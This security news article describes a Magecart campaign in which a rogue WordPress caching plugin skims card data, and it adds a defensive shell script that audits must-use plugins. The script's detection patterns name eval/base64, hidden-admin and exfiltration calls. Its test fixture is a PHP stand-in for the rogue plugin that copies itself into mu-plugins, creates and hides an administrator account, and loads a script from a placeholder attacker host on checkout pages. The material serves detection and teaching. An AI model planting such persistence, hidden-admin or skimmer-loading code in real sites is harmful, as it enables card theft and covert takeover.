Security researchers have discovered a rogue WordPress plugin that is part of a Magecart campaign targeting e-commerce websites [1] [2] [4]. The plugin masquerades as a legitimate caching plugin ("WordPress Cache Addons") and reaches victim sites either through compromised administrator accounts or by exploiting security flaws in other installed plugins [4].

Description

Once installed, the plugin copies itself into the must-use plugins directory (wp-content/mu-plugins) [2] [4]. Files in that directory are loaded automatically on every request and do not appear in the standard Plugins list, so the copy is both enabled and concealed from the admin panel [4]. The plugin can also create an administrator account and hide it from the Users screen [4], giving the attackers a way back in even if the original foothold is closed. The campaign's objective is payment-card theft: a JavaScript skimmer is injected into checkout pages and the captured card data is sent to an attacker-controlled domain. Because the plugin hides both itself and its user from wp-admin, checks made through the dashboard alone are unreliable; the filesystem and the database should be inspected directly.
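Since must-use plugins load unconditionally and sit where an administrator rarely looks, the first thing to check on a suspected site is the contents of wp-content/mu-plugins. The shell script below is an added example, not code from the page or from the researchers it cites. It lists every PHP file in that directory with a content hash and flags indicators of the behaviour described above (hooks that hide plugins or users, administrator creation, remote script tags, eval/base64), then runs against a constructed fixture that mimics that behaviour. The indicator list, the hook names it looks for, and the fixture file names and contents are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not code from the page or from the researchers it cites.
# Audits a WordPress tree for must-use plugins: every .php file directly under
# wp-content/mu-plugins is loaded on every request and cannot be deactivated
# from the Plugins screen, so a rogue file there is both persistence and
# concealment. The indicator list below is an assumption about the WordPress
# hooks such a plugin would plausibly use; it is not taken from the page.

# Short content hash so findings can be compared across hosts.
file_hash() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -c1-16
    else
        shasum -a 256 "$1" | cut -c1-16
    fi
}

# Usage: audit_mu_plugins /var/www/html
# Prints one line per file: "SUSPECT <hash> <path> : <labels>" or "ok <hash> <path>".
audit_mu_plugins() {
    mu_dir="$1/wp-content/mu-plugins"
    [ -d "$mu_dir" ] || { echo "no mu-plugins directory under $1"; return 0; }
    find "$mu_dir" -type f -name '*.php' | sort | while IFS= read -r f; do
        hits=""
        # label:extended-regex pairs (assumed indicators, not a complete list)
        for ind in \
            'eval_or_b64:eval[[:space:]]*\(|base64_decode' \
            'hide_plugin:all_plugins|show_advanced_plugins' \
            'hide_user:pre_user_query|views_users|users_list_table_query_args' \
            'add_admin:wp_(create|insert)_user|set_role' \
            'self_copy:WPMU_PLUGIN_DIR|mu-plugins' \
            'remote_script:<script[^>]*src=' \
            'exfil:wp_remote_(post|get)|curl_init|fsockopen'; do
            label=${ind%%:*}
            pattern=${ind#*:}
            grep -Eq "$pattern" "$f" && hits="$hits $label"
        done
        if [ -n "$hits" ]; then
            echo "SUSPECT $(file_hash "$f") $f :$hits"
        else
            echo "ok      $(file_hash "$f") $f"
        fi
    done
}

# Constructed fixture: a throwaway WordPress-like tree with one benign
# must-use plugin and one stand-in for the rogue plugin, written to mimic the
# behaviour the page describes (copy to mu-plugins, hide from the plugin list,
# create and hide an administrator, inject a remote script on checkout).
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/mu-plugins"
    cat > "$root/wp-content/mu-plugins/site-tweaks.php" <<'EOF'
<?php
// Constructed benign mu-plugin: hide the toolbar on the front end.
add_filter('show_admin_bar', '__return_false');
EOF
    cat > "$root/wp-content/mu-plugins/wp-cache-addons.php" <<'EOF'
<?php
/* Constructed stand-in for a rogue "cache" plugin; not the real sample. */
if (strpos(__FILE__, 'mu-plugins') === false) {
    copy(__FILE__, WPMU_PLUGIN_DIR . '/' . basename(__FILE__));
}
add_filter('all_plugins', function ($p) { unset($p['wp-cache-addons/wp-cache-addons.php']); return $p; });
add_action('pre_user_query', function ($q) { $q->query_where .= " AND user_login != 'cacheuser'"; });
if (!username_exists('cacheuser')) {
    $id = wp_create_user('cacheuser', 'changeme', 'cache@example.invalid');
    (new WP_User($id))->set_role('administrator');
}
add_action('woocommerce_after_checkout_form', function () {
    echo '<script src="https://attacker.invalid/s.js"></script>';
});
eval(base64_decode($blob)); // payload omitted in this constructed sample
EOF
    echo "$root"
}

# Stand-alone demo run against the constructed fixture.
demo_root=$(make_fixture)
audit_mu_plugins "$demo_root"
rm -rf "$demo_root"
```

On a live host, run audit_mu_plugins against the WordPress root and treat any file in mu-plugins that you did not put there as hostile whether or not an indicator fires; the hash lets you compare the file against a known-good copy or another host. Because a plugin hooking pre_user_query can filter what the Users screen (and anything else that goes through WP_User_Query while the plugin is loaded) shows, confirm the set of administrators directly from the database, for example with `wp db query "SELECT ID, user_login FROM wp_users"` joined against the capabilities row in wp_usermeta, rather than from wp-admin. The `wp_` table prefix is the default and is an assumption here.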

Separately, another Magecart campaign has been observed using the WebSocket protocol to deliver skimmer code to online storefronts [4]. Skimming of this kind feeds a chain of theft, resale and fraudulent use of card data [4]. Europol has notified 443 online merchants that their customers' card data had been compromised [4], and Group-IB has identified 23 families of JS-sniffers used in attacks against companies in 17 countries [4].

Further afield, bogus advertisements on Google Search and Twitter have been used to promote a cryptocurrency drainer known as MS Drainer, which has reportedly stolen millions of dollars from thousands of victims. Those reports followed a warning about a phishing campaign that tricks WordPress users into installing a plugin disguised as a security patch [4]; the lure referenced a CVE identifier whose record was still in "RESERVED" status [4], meaning no public details yet existed that a recipient could use to check the claim.

Conclusion

These incidents underline the continuing exposure of popular content management systems [5], WordPress in particular [1] [2] [3] [4] [5], and the need for layered defences: keep plugins patched, restrict and monitor administrator accounts, and watch the filesystem for unexpected changes. The growing sophistication of these attacks is a standing risk for e-commerce sites, and staying current on the latest threats remains necessary to limit damage and protect customer data.

References

[1] https://www.ihash.eu/2023/12/rogue-wordpress-plugin-exposes-e-commerce-sites-to-credit-card-theft/
[2] https://windows8.myblog.it/2023/12/22/risk-alert-rogue-wordpress-plugin-endangers-e-commerce-credit-card-data/
[3] https://allinfosecnews.com/item/magecart-wordpress-plugin-injects-malicious-user-credit-card-skimmer-2023-12-21/
[4] https://thehackernews.com/2023/12/rogue-wordpress-plugin-exposes-e.html
[5] https://bragg.substack.com/p/daily-drop-672-houthi-attacks-magecart